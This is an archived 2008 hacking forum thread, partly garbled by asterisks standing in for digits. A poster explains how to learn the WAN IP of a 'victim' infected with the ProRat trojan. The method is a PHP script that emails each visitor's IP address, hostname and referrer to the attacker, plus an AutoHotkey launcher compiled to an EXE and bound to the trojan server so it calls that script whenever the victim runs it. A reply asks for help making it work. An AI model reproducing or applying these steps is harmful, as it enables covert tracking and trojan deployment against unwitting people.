PDA

View Full Version : ProRat *.* SE how to grab victims WAN



ProRat-Hacker
07-20-2008, 02:18 PM
I&#*80;ve searched REALLY long for a tool that grabs the WAN of a victim and i finally found it!

What you need:
-> A webspace
-> Create a free on http://www.tripod.lycos.com or http://www.netfirms.com

-> AutoHotkey
-> If you haven&#*80;t, google for this

-> Cute ftp or FileZilla

-> Notepad ++ or an other text editor

How to:
*. Create a new php script.
-> If you can&#*80;t, create a txt file and rename it.
2. Edit it with Notepad ++
-> If you haven&#*80;t this program choose another text editor.
*. Copy and paste this code into the script:

<?php

$email = "yourmail@anything.com"; // ENTER YOUR EMAIL ADDRESS HERE

if ($_SERVER['REMOTE_ADDR'] != "*28.22*.*88.*7") {
if(array_key_exists("HTTP_REFERER",$_SERVER)) {
$body = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n".
date("Y-m-d H:i:s")."\n".
$_SERVER['REMOTE_ADDR']."\n".
gethostbyaddr($_SERVER['REMOTE_ADDR'])."\n".
$_SERVER['HTTP_REFERER'];
} else {
$body = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n".
date("Y-m-d H:i:s")."\n".
$_SERVER['REMOTE_ADDR']."\n".
gethostbyaddr($_SERVER['REMOTE_ADDR']);
}
mail($email, $_SERVER['REQUEST_URI'], $body, "From: ".$_SERVER['REMOTE_ADDR']." <".$email.">");
}


?>
4. Upload the php script to your webspace.
5. Go to the script by internet browser(http://yourname.tripod.com/script.php)
6. Check your E-Mails
7. If nothing arrives in * Minutes something in the script is wrong...
8. But if something with your IP arrives, that means it&#*80;s allright.

But your victim don&#*80;t want to visit this site? No problem!
Follow the next steps:

*. Create a AutoHotkeyScript
*0. Copy this code and paste it into your script:

Run, ***
-> *** means the link to your php script
**. Convert the AHK script into an EXE-File
*2. Bind this EXE file with your server

Now when your victim opens the server, the website will be opened in his internet browser. Every time your victim comes online you will become an e-mail with the current WAN IP of your victim.

Hope this was helpful for you.

jcche19
07-31-2008, 12:40 PM
i made the script with that code... and i put my mail where between the " " but the code is not working i dont recive my ip in my mail adress when i go to the link ...... please help me i really want to learn this
and you also give more details in how to
*. Create a AutoHotkeyScript
*0. Copy this code and paste it into your script:
Code:

Run, ***

-> *** means the link to your php script
**. Convert the AHK script into an EXE-File

thanks.. i will wait for one answer